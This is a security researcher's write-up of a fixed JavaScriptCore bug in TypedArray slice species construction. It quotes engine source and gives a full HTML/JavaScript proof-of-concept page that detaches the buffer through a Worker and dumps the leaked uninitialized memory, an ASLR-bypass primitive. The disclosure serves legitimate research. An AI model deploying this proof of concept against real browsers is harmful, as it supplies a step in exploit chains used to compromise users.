JSC %TypedArray%.slice infoleak
Just a very quick writeup of a bug I found in JavaScriptCore a few weeks ago. The code was at that time only shipping in the Safari Technology Preview and got fixed there with release 12.
The bug was located in TypedArrayView.prototype.slice when performing species construction. From JSGenericTypedArrayViewPrototypeFunctions.h:
template<typename ViewClass>
EncodedJSValue JSC_HOST_CALL genericTypedArrayViewProtoFuncSlice(ExecState* exec)
// ...
JSArrayBufferView* result = speciesConstruct(exec, thisObject, args, [&]() {
Structure* structure = callee->globalObject()->typedArrayStructure(ViewClass::TypedArrayStorageType);
return ViewClass::createUninitialized(exec, structure, length);
if (exec->hadException())
return JSValue::encode(JSValue());
// --1--
// We return early here since we don't allocate a backing store if length is 0 and memmove does not like nullptrs
if (!length)
return JSValue::encode(result);
// The species constructor may return an array with any arbitrary length.
length = std::min(length, result->length());
switch (result->classInfo()->typedArrayStorageType) {
case TypeInt8:
jsCast<JSInt8Array*>(result)->set(exec, 0, thisObject, begin, length, CopyType::LeftToRight);
/* other cases */
return JSValue::encode(result);
At –1– there is no check if the thisObject’s buffer has been transferred (detached/neutered) while executing a species constructor. Also note that the default constructor (the lambda expression) creates an uninitialized array. It is possible to detach the array buffer during speciesConstruct while also invoking the default constructor, for example by setting up the target array as follows:
var a = new Uint8Array(N);
var c = new Function();
c.__defineGetter__(Symbol.species, function() { transferArrayBuffer(a.buffer); return undefined; });
a.constructor = c;
JSGenericTypedArrayView::set then does the following:
template<typename Adaptor>
bool JSGenericTypedArrayView<Adaptor>::set(
ExecState* exec, unsigned offset, JSObject* object, unsigned objectOffset, unsigned length, CopyType type)
const ClassInfo* ci = object->classInfo();
if (ci->typedArrayStorageType == Adaptor::typeValue) {
// The super fast case: we can just memcpy since we're the same type.
JSGenericTypedArrayView* other = jsCast<JSGenericTypedArrayView*>(object);
length = std::min(length, other->length());
RELEASE_ASSERT(other->canAccessRangeQuickly(objectOffset, length));
if (!validateRange(exec, offset, length))
return false;
memmove(typedVector() + offset, other->typedVector() + objectOffset, length * elementSize);
return true;
// ...
here, other will be the original array which is detached by now. Its length will be zero and memmove becomes a nop. This results in an uninitialized array being returned to the caller, potentially leaking addresses and thus allowing for an ASLR bypass.
Here is a complete single-page application ;) to trigger the bug and dump the leaked data:
<!DOCTYPE html>
body {
font-family: monospace;
if (typeof window !== 'undefined') {
print = function(msg) {
document.body.innerText += msg + '\n';
function hex(b) {
return ('0' + b.toString(16)).substr(-2);
function hexdump(data) {
if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
data = Array.from(data);
var lines = [];
for (var i = 0; i < data.length; i += 16) {
var chunk = data.slice(i, i+16);
var parts = chunk.map(hex);
if (parts.length > 8)
parts.splice(8, 0, ' ');
lines.push(parts.join(' '));
return lines.join('\n');
function trigger() {
var worker = new Worker('worker.js');
function transferArrayBuffer(ab) {
worker.postMessage([ab], [ab]);
var a = null;
var c = function(){};
c.__defineGetter__(Symbol.species, function() { transferArrayBuffer(a.buffer); return undefined; });
for (var i = 0; i < 1000; i++) {
// Prepare array object
a = new Uint8Array(new ArrayBuffer(1024));
a.constructor = c;
// Trigger the bug
var b = a.slice(0, 1024);
// Check if b now contains nonzero values
if (b.filter((e) => e != 0).length > 0) {
print('leaked data:');
<body onload="trigger()">
<p>please wait...</p><br />
The original report will eventually be available here.